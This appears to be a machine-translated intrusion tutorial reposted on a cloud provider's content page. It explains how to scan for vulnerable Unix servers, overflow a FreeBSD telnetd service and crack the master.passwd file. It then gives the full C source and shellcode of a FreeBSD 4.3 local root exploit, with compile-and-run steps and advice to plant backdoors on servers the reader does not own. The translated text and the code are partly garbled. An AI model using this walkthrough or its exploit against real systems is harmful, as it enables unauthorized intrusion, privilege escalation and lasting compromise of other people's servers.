How to find a Unix vulnerability server (figure)

Source: Internet
Author: User

Why am I looking for a vulnerable server with x-laser? Because all our operations are performed on the 3389 vulnerability server. First, we all go to the same terminal (premise: the terminal is open to the peer, rather than your own, so that the terminal service manager is available) then, Use Terminal Management in the management tool to switch the id (select the user to connect)

In this way, two people can control each other, and every action is clear. This method is good, greatly improving efficiency and increasing the pleasure of intrusion. We recommend that you promote it :)
Now let's start working. Since windows is used for unix classes, we 'd better have exploit on Windows to get the first unix vulnerability server. You can use cygwin to compile exploits for Windows on www.isfocus.com. Or go to e4gle.org on the e homepage or www.cnhonker.net/old.php) to download the file. Note that you need to download the cygwin1.dll file together.
What we need to do now is to find a large number of unix vulnerability servers and then find the vulnerabilities. But how can we find them? At this time, we have requested our mongoard network plugin. After a simple setup, let him run quickly, we will start scanning.

We can see that there is a freebsd, which is a good bully because there was a popular telnetd Remote Overflow Vulnerability some time ago. Of course, we can also use superscan to quickly determine the operating system. We use superscan to scan port 23, Because telnet usually has a banner, so that we can know the operating system type.

We scanned two linux servers ,..... ... #... 'Is the identifier of linux.
........ #... Is the sunos operator. If you use it, you will have experience.

Let's look at our freebsd.we started to overflow after bsd.exe and cygwin1.dll in red league.

Because we want to send 16 MB of data, it may take a little longer.
After the command is successful, the command?
This is the input id
You can see that you have become the root user. Of course, you can also capture the shadow.
The adow file is/etc/master. passwd, then john runs a user name and downloads the version under windows where john exists at www.xfocus.net, which is also compiled using cygwin), and then telnet to it, the normal account is obtained (because the root account is generally difficult to break), and then local overflow occurs. Why is it so troublesome? Many remote shells do not display back, so it is not convenient to add accounts. Generally, an account added to bsd is executed under/usr/sbin. /adduser, and then follow the prompts. The bsd system is very stable. Many large websites use this Site, such as hongmeng. I will paste the local overflow code here.

? Affected Versions: FreeBSD 4.3 4.2 4.1 4.0

Earlier versions may be affected by the usage of the test program:

Netdemon % gcc-o vvbsd. c netdemon % cp/bin/sh/tmp netdemon %. /vvbsd vvfreebsd. written by Georgi Guninski shall jump to bfbffe71 child = 61056 login: # done #

FreeBSD 4.3 was found to have a design vulnerability that allows users to insert signal handlers in other processes.

The problem lies in rfork (RFPROC | RFSIGSHARE). If the child process exec () has a setuid program and the parent process sets a signal handlers, the signal handlers will be copied in the child process. Sending a signal to the sub-process can cause signal handlers to be executed. Attackers can exploit this vulnerability to obtain root privileges. Vvfreebsd. c

/* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski */# Include # Include # Include Int vv1; # define mysig sigint // exec "/tm
P/sh ", shellcode gotten from the internet and modified unsigned char bsdshell [] = "\ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90" "\ x31 \ xc0 \ x50 \ x50 \ xb0 \ xb7 \ xcd \ x80 "" \ x31 \ xc0 \ x50 \ x50 \ xb0 \ x17 \ xcd \ x80 "" \ x31 \ xc0 \ x50 \ x68 \ x2f \ x2f \ x73 \ x68 \ x68 \ x2f "" \ x74 \ x6d \ x89 \ xe3 \ x50 \ x53 \ x50 \ x54 \ x53 "" \ xb0 \ x3b \ x50 \ xcd \ x80 \ x90 \ x90 \ x90 "; typedef (* PROG) (); extern char ** environ; int main (int ac, char ** av) {int pid; // (* (PROG) bs Dshell) (); if (! (Vv1 = getenv ("vv") {setenv ("vv", bsdshell, 1); if (! Execle (av [0], "vv", NULL, environ) {perror ("weird exec"); exit (1) ;}} printf ("vvfreebsd. written by Georgi Guninski \ n "); printf (" shall jump to % x \ n ", vv1); if (! (Pid = rfork (RFPROC | RFSIGSHARE) {printf ("child = % d \ n", getpid ()); /// usr/bin/login and rlogin work for me. ping gives nonsuid shell // if (! Execl ("/usr/bin/rlogin", "rlogin", "localhost", 0) if (! Execl ("/usr/bin/login", "login", 0) {perror ("exec setuid failed"); exit (2 );};} sleep (2); signal (MYSIG, (sig_t) vv1); sleep (2); kill (pid, MYSIG); printf ("done \ n"
); While (42 );}

/* Extreme Network Security Group */


You can find the writable location, and then cat> vv. c press Enter.
(Right-click and paste)
Ctrl + d save
Gcc-o vv. c compilation (gcc is called cc in solaris and aix systems)
Cp/bin/csh/tmp
./Vv
In this way, you can get the root. Note that the second sentence is required by the Code.
Then go to adduser and put a bunch of backdoors.
Some Supplements: 1. Command w to check which lines are currently online. Be careful if you see root.

  1. How to enhance the security of Linux and Unix server systems
  2. Design and Implementation of Unix host security vulnerability analysis and vulnerability scanner
  3. Unix Web Server Security Guide

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.